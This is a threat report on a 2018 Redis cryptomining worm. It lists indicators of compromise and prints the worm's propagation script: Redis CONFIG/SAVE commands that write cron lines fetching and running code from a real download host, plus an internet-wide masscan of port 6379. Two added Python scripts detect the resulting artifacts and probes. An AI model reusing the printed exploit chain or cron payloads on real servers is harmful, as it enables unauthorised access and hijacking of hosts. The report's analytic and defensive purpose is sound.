Threat Alert: A Redis.Miner

IoC

Download servers

159.89.190.243  
img.namunil.com  
cdn.namunil.com  

Download URLs

hxxp://img.namunil.com/ash.php  
hxxp://img.namunil.com/bsh.php  
hxxp://img.namunil.com/rsh.php  
hxxp://cdn.namunil.com/ash.php  
hxxp://cdn.namunil.com/bsh.php  
hxxp://cdn.namunil.com/ins.php  
hxxp://cdn.namunil.com/pgp.php  
hxxp://cdn.namunil.com/rsh.php  
hxxp://cdn.namunil.com/sh.php  

Mining program

hxxp://img.namunil.com/dump.db  
hxxp://cdn.namunil.com/dump.db  

SSH login key (public key appended to the file below)
/root/.ssh/authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx redisX  

Scale estimate

  • Scan scale: port 6379 ranked 14th (673 unique source IPs within 24 hours)
  • The download servers' domain ranking is still very low, far outside the top one million:
    • 0.327100 401126302 2018-03-23 cdn.namunil.com
    • 0.572953 174202964 2018-03-23 img.namunil.com
  • Mining profit: unknown; the pool used, z.chakpools.com, is not a well-known mining pool and did not respond

Worm-style propagation

The payload is dropped through a Redis vulnerability: an instance reachable without authentication lets the attacker point the dump directory and file name at the cron spool and SAVE a database whose keys contain cron lines, as the commands below show. The masscan used for scanning is downloaded and compiled by the malware itself.

echo 'config set dbfilename "backup.db"' > .dat  
echo 'save' >> .dat  
echo 'flushall' >> .dat  
echo 'set jmTIabkD "\n*/2 * * * * curl http://cdn.namunil.com/sh.php|sh\n"' >> .dat  
echo 'set yCEpdj "\n*/4 * * * * wget -O- http://cdn.namunil.com/sh.php|sh\n"' >> .dat  
echo 'set cNaGUd "\n*/5 * * * * /usr/bin/curl -qs http://cdn.namunil.com/sh.php|/bin/sh\n"' >> .dat  
echo 'set mKjzHoR "\n*/10 * * * * /usr/bin/wget -q -O- http://cdn.namunil.com/sh.php|/bin/sh\n"' >> .dat  
echo 'config set dir "/var/spool/cron"' >> .dat  
echo 'config set dbfilename "root"' >> .dat  
echo 'save' >> .dat  
echo 'config set dir "/var/spool/cron/crontabs"' >> .dat  
echo 'save' >> .dat  
iptables -A INPUT -p tcp --dport 60000 -j DROP

masscan --banners --no-show open --shard 18499/20000 --source-port 60000 --hello-string[6379] "KjQNCiQ2DQpjb25maWcNCiQzDQpzZXQNCiQzDQpkaXINCiQxNQ0KL3Zhci9zcG9vbC9jcm9uDQo=" --max-rate 10000 -p6379 0.0.0.0/0 --exclude 255.255.255.255 2>/dev/null -oG - | awk '/+OK/ {print $2, $5}' | sort | uniq > .r1  
while read -r h p; do  
cat .dat | redis-cli -h $h -p $p --raw > /dev/null 2>&1 &  
done < .r1  
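The script above leaves two durable artifacts on a compromised host: an RDB dump written into the cron spool whose embedded keys are the cron lines (cron skips the binary lines and runs the rest), and, per the IoC section, the attacker's public key in /root/.ssh/authorized_keys. The host-triage script below is an added example written for this report, not code from the original or from the malware. It checks for exactly those artifacts: a crontab that begins with the RDB magic "REDIS", crontab lines that pipe a download into a shell or reference the listed hosts, and the listed key in root's authorized_keys. The cron directory list and the pipe-to-shell pattern are this example's assumptions, and the sample tree it builds is constructed for the demonstration.

```python
import os
import re
import tempfile

# Indicators copied from the IoC section of this report.
IOC_HOSTS = ("namunil.com", "159.89.190.243")
IOC_KEY_COMMENT = "redisX"
IOC_KEY_BODY = (
    "AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx"
)

# Every RDB file written by SAVE starts with this magic; a crontab never should.
RDB_MAGIC = b"REDIS"
# Assumption of this example: a crontab line that fetches with curl/wget and
# pipes into a shell is treated as hostile regardless of the host it names.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(/bin/)?sh\b")
# Cron locations checked, relative to the filesystem root (example's assumption).
CRON_DIRS = ("var/spool/cron", "var/spool/cron/crontabs", "etc/cron.d")


def scan_crontab(path):
    """Return a list of findings for one crontab file."""
    findings = []
    with open(path, "rb") as f:
        data = f.read()
    if data.startswith(RDB_MAGIC):
        findings.append("rdb-magic")
    # Split on "\n" only: RDB binary junk may contain bytes that str.splitlines()
    # would treat as line breaks, and cron itself only splits on newline.
    for line in data.decode("latin-1").split("\n"):
        line = line.strip()
        if PIPE_TO_SHELL.search(line):
            findings.append("pipe-to-shell: " + line)
        elif any(h in line for h in IOC_HOSTS):
            findings.append("ioc-host: " + line)
    return findings


def scan_authorized_keys(path):
    """Flag the campaign's key by its body or by its 'redisX' comment."""
    findings = []
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        for line in f:
            if IOC_KEY_BODY in line or line.split()[-1:] == [IOC_KEY_COMMENT]:
                findings.append("ioc-ssh-key: " + line.strip()[:40] + "...")
    return findings


def triage(root="/"):
    """Walk the cron spool directories and root's authorized_keys under `root`.
    Returns {relative path: [findings]} for files with at least one finding."""
    results = {}
    for d in CRON_DIRS:
        full = os.path.join(root, d)
        if not os.path.isdir(full):
            continue
        for name in sorted(os.listdir(full)):
            p = os.path.join(full, name)
            if os.path.isfile(p):
                hits = scan_crontab(p)
                if hits:
                    results[os.path.relpath(p, root)] = hits
    ak = os.path.join(root, "root/.ssh/authorized_keys")
    if os.path.isfile(ak):
        hits = scan_authorized_keys(ak)
        if hits:
            results[os.path.relpath(ak, root)] = hits
    return results


def build_sample_tree():
    """Constructed sample, not taken from a real host: a throwaway tree with an
    RDB file in the cron spool carrying one of the campaign's cron lines, a
    benign user crontab, and the attacker key in root's authorized_keys."""
    root = tempfile.mkdtemp(prefix="redis-miner-triage-")
    os.makedirs(os.path.join(root, "var/spool/cron/crontabs"))
    os.makedirs(os.path.join(root, "root/.ssh"))
    rdb = (b"REDIS0007\xfa\x09redis-ver\x05x.y.z\xfe\x00"  # fake RDB header bytes
           b"\n*/2 * * * * curl http://cdn.namunil.com/sh.php|sh\n\xff")
    with open(os.path.join(root, "var/spool/cron/root"), "wb") as f:
        f.write(rdb)
    with open(os.path.join(root, "var/spool/cron/crontabs/user"), "w") as f:
        f.write("0 3 * * * /usr/local/bin/backup.sh\n")  # benign, must not fire
    with open(os.path.join(root, "root/.ssh/authorized_keys"), "w") as f:
        f.write("ssh-rsa " + IOC_KEY_BODY + " " + IOC_KEY_COMMENT + "\n")
    return root


if __name__ == "__main__":
    print(triage(build_sample_tree()))  # demo on the constructed tree
    print(triage("/"))                  # real run; needs root to read the spool
```

Run it as root so the cron spool is readable. A positive result on the cron spool means the Redis instance was writable from the network, so the fix is to stop exposing it (bind to localhost, require a password, or disable CONFIG), not just to delete the crontab, since the scanner will return.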

Proof that the malware and the recent port 6379 scans share the same source

The malware contains the following masscan hello-string, and restricts its source port to 60000:

$ echo KjQNCiQ2DQpjb25maWcNCiQzDQpzZXQNCiQzDQpkaXINCiQxNQ0KL3Zhci9zcG9vbC9jcm9uDQo= | base64 -d
*4
$6
config  
$3
set  
$3
dir  
$15
/var/spool/cron

This is consistent with the scan payload we have recently seen on port 6379:

2018-03-23 14:23:54    redis    sip=111.231.121.59    dip=-    sport=60000    dport=65535    proto=tcp    tcp.payload=eJzSMuHlUjHj5UrOz0vLTOflUjHm5SpOLYEwUjKLeLlUDE15ufTLEov0iwvy83P0k4vy83i5AAEAAP//WKwNdg==    src=hp  
$ fes -X eJzSMuHlUjHj5UrOz0vLTOflUjHm5SpOLYEwUjKLeLlUDE15ufTLEov0iwvy83P0k4vy83i5AAEAAP//WKwNdg==
>>>sha1: 38472e9bfbf6148a9e887ae8196b6b2d2e6005e0    plen:56
*4
$6
config  
$3
set  
$3
dir  
$15
/var/spool/cron
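Both decodes above end in the same 56-byte RESP message: the masscan hello-string is plain base64, while the sensor record stores the payload base64-encoded on top of zlib (the `eJz` prefix is the base64 form of a zlib header), which is what the `fes -X` step undoes. The following Python is an added example written for this report, not code from the original or from the fes tool. It redoes both decodes, parses the RESP array into a command, and flags a `CONFIG SET dir` that points at a sensitive directory, which is the check a network sensor or Redis proxy would apply to spot this campaign's probe. The list of sensitive directories beyond the cron spool is this example's assumption.

```python
import base64
import hashlib
import zlib

# Both strings are copied from the report above: the masscan --hello-string
# and the tcp.payload field of the sensor record.
MASSCAN_HELLO_B64 = "KjQNCiQ2DQpjb25maWcNCiQzDQpzZXQNCiQzDQpkaXINCiQxNQ0KL3Zhci9zcG9vbC9jcm9uDQo="
SENSOR_PAYLOAD_B64 = ("eJzSMuHlUjHj5UrOz0vLTOflUjHm5SpOLYEwUjKLeLlUDE15ufTL"
                      "Eov0iwvy83P0k4vy83i5AAEAAP//WKwNdg==")

# Directories that turn a Redis SAVE into code execution or account access.
# The cron spool is what this campaign uses; the others are this example's
# assumption about the usual companions. Extend for your environment.
DANGEROUS_DIRS = ("/var/spool/cron", "/etc/cron.d", "/root/.ssh", "/home/")


def decode_payload(b64):
    """Base64-decode a captured payload; if the result carries a zlib header
    (first byte 0x78 and the first two bytes divisible by 31), inflate it.
    Plain RESP begins with '*', so the two forms cannot be confused."""
    raw = base64.b64decode(b64)
    if len(raw) >= 2 and raw[0] == 0x78 and (raw[0] * 256 + raw[1]) % 31 == 0:
        raw = zlib.decompress(raw)
    return raw


def parse_resp(buf):
    """Minimal parser for RESP arrays of bulk strings, the form redis-cli and
    masscan's hello-string use. Returns a list of commands, each a list of
    str arguments. Raises ValueError on any other RESP type."""
    commands = []
    pos = 0
    while pos < len(buf):
        if buf[pos:pos + 1] != b"*":
            raise ValueError("expected RESP array at offset %d" % pos)
        end = buf.index(b"\r\n", pos)
        count = int(buf[pos + 1:end])
        pos = end + 2
        args = []
        for _ in range(count):
            if buf[pos:pos + 1] != b"$":
                raise ValueError("expected bulk string at offset %d" % pos)
            end = buf.index(b"\r\n", pos)
            length = int(buf[pos + 1:end])
            pos = end + 2
            args.append(buf[pos:pos + length].decode("utf-8", "replace"))
            pos += length + 2  # skip the value and its trailing CRLF
        commands.append(args)
    return commands


def suspicious_dirs(commands):
    """Return the targets of any CONFIG SET dir aimed at a sensitive directory.
    Redis command names are case-insensitive, so compare lowered."""
    hits = []
    for args in commands:
        if len(args) == 4 and [a.lower() for a in args[:3]] == ["config", "set", "dir"]:
            if any(args[3].startswith(d) for d in DANGEROUS_DIRS):
                hits.append(args[3])
    return hits


def analyse(b64):
    """Decode, parse and classify one captured payload."""
    payload = decode_payload(b64)
    commands = parse_resp(payload)
    return {
        "plen": len(payload),
        "sha1": hashlib.sha1(payload).hexdigest(),
        "commands": commands,
        "suspicious_dirs": suspicious_dirs(commands),
    }


if __name__ == "__main__":
    for name, b64 in (("masscan hello", MASSCAN_HELLO_B64),
                      ("sensor record", SENSOR_PAYLOAD_B64)):
        print(name, analyse(b64))
```

Either input yields plen 56 and the single command `config set dir /var/spool/cron`, which is what ties the malware's scanner to the scans seen by the sensors. The same `suspicious_dirs` check works on live traffic: a client that has never authenticated and whose first command sets `dir` to a cron or SSH path is a scanner, not an application.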